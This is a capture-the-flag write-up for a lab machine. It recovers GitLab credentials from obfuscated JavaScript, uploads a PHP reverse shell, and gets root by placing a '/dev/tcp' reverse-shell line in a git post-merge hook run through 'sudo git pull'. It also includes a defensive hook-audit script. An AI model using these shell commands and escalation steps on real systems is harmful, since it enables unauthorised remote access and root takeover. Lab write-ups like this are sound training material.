info

Target IP: 10.10.10.114

Exploitation Summary

Initial Exploitation

  • Vulnerability: Security through obscurity
  • Explanation: Credentials are obscured in a JavaScript function within the website.

Privilege Escalation

  • Vulnerability: sudo git pull
  • Explanation: A post-merge hook script can be defined so that the pull executes code as root.

Enumeration

nmap -p- -A -T4 10.10.10.114

nmap scan
TCP 22: OpenSSH 7.6p1
TCP 80: nginx

Initial Shell Exploitation

Let’s check out the website

website

The home page redirects to the sign in page. The bottom has two links of interest: Explore and Help.

explore page

The Explore link brings us to the Projects page where we can see current projects, groups and snippets. Unfortunately, there is no content here.

Help page

The Help page only has a bookmarks.html link that brings us to the following screen:

bookmarks

All links except Gitlab Login point to external sites. When hovering over the Gitlab Login link, it shows some JavaScript code: a function with a variable defined inside it. To find out what the variable contains, we can use the browser's developer console:

  • press F12
  • click Console tab
  • paste only the variable portion of the javascript
  • examine the variable _0x4b18
check javascript variable

These look like login credentials. The easiest way to use them is to bookmark the link (right click on the link):

bookmark

Now go back to the login page and select the bookmarked link:

populate credentials

The credentials are populated into the sign in form. How convenient. Of course, we can also simply type the credentials in ourselves. Now click Sign In and we are signed in to the application successfully.

signed in

This Gitlab lets us maintain our projects, so essentially we can upload any file to a project. Let’s prepare a PHP reverse shell using the following command. It will use IP address 10.10.14.34 and port 443, and name the file shell443.php.

cat /usr/share/webshells/php/php-reverse-shell.php | sed "s/127.0.0.1/10.10.14.34/g" | sed "s/1234/443/g" > shell443.php 

It’s time to upload the file.

  • navigate to project Profile
  • click + icon
  • select Upload file
upload file
  • click to select file shell443.php
  • click Upload file
upload file confirm

The file should now be uploaded. Now make it available to the website.

  • scroll down and click Submit merge request
submit merge request
  • click Merge
merge

The file is ready. Now use netcat to listen on port 443:

nc -nvlp 443

And navigate to http://10.10.10.114/profile/shell443.php

initial shell obtained

Privilege Escalation

sudo -l
sudo

sudo -l is one of the first commands I use to determine whether the user can run any commands as root. Sure enough, we are able to run git pull.

It’s not immediately clear how this can be used to escalate privileges. After some research on Google I found a feature called git hooks. A git hook is basically a trigger that executes a custom script when a certain event or action occurs. A couple of good reads can be found at:

For git pull, a post-merge hook script can be used; it is triggered whenever the pull results in a merge.

To achieve that, we will create a local copy of the project Profile. Then we make some changes and perform a merge. Finally, doing a sudo git pull in the local copy will trigger the custom post-merge script defined in that copy. Now, let’s put this into action.
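From the defender's side, the same mechanism is easy to audit. The following script is an added example, not part of the original writeup: it lists the executable hook scripts in a checkout's .git/hooks directory and picks out the ones a git pull would run, which is exactly what a sudo rule for git pull hands to the invoking user as root. The repository layout it builds is constructed for the demo, and a core.hooksPath override (which relocates the hooks directory) is assumed out of scope.

```python
import stat
import tempfile
from pathlib import Path

# Client-side hooks that git runs after a pull brings in a merge. An
# executable file with one of these names runs as whoever invoked git,
# which is root when git is run through sudo.
MERGE_SIDE_HOOKS = ("post-merge", "post-checkout", "post-rewrite")


def find_active_hooks(repo_root):
    """List executable hook scripts in <repo_root>/.git/hooks as
    (name, first line) pairs, skipping the *.sample files git ships with.
    Caveat: a core.hooksPath setting redirects hooks elsewhere and is not
    followed here."""
    hooks_dir = Path(repo_root) / ".git" / "hooks"
    if not hooks_dir.is_dir():
        return []
    found = []
    for entry in sorted(hooks_dir.iterdir()):
        if not entry.is_file() or entry.suffix == ".sample":
            continue
        if entry.stat().st_mode & stat.S_IXUSR:
            first = entry.read_text(errors="replace").splitlines()[:1]
            found.append((entry.name, first[0] if first else ""))
    return found


def merge_triggered_hooks(repo_root):
    """Subset of active hooks that a `git pull` would execute."""
    return [h for h in find_active_hooks(repo_root) if h[0] in MERGE_SIDE_HOOKS]


def build_demo_repo():
    """Constructed sample checkout (only the hooks directory, not a real
    repository) with one stock sample file and one live post-merge hook."""
    root = Path(tempfile.mkdtemp(prefix="hookaudit-"))
    hooks = root / ".git" / "hooks"
    hooks.mkdir(parents=True)
    (hooks / "pre-commit.sample").write_text("#!/bin/sh\n")
    (hooks / "pre-commit.sample").chmod(0o755)
    (hooks / "post-merge").write_text("#!/bin/bash\necho constructed hook\n")
    (hooks / "post-merge").chmod(0o755)
    return str(root)


if __name__ == "__main__":
    repo = build_demo_repo()
    for name, line in merge_triggered_hooks(repo):
        print(f"{repo}: active {name} hook, starts with: {line}")
```

Run it against any checkout that appears in a sudoers entry for git; a non-empty result from merge_triggered_hooks is a finding worth reviewing.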

Make a local copy

cd /tmp
cp -r /var/www/html/profile .

Modify shell443.php and perform a merge again:

  • click on shell443.php
  • click Edit
  • make some changes (any change will do)
  • click Commit changes
modify shell443
  • click Submit merge request
  • click Merge (just like when we first uploaded the file)

Prepare hook post-merge script

cd /tmp/profile/.git/hooks
echo '#!/bin/bash' > post-merge
echo 'bash -i >& /dev/tcp/10.10.14.34/4000 0>&1' >> post-merge
chmod 755 post-merge

This script, when executed, will connect back to the Kali machine on port 4000.

Listen with netcat on port 4000

nc -nvlp 4000

Perform git pull (final trigger)

cd /tmp/profile
sudo git pull
git pull
root shell

root shell obtained.

Loot

We got both user & root flags after rooting the box.

user flag
root flag

Thank you for the box, Frey & thek.
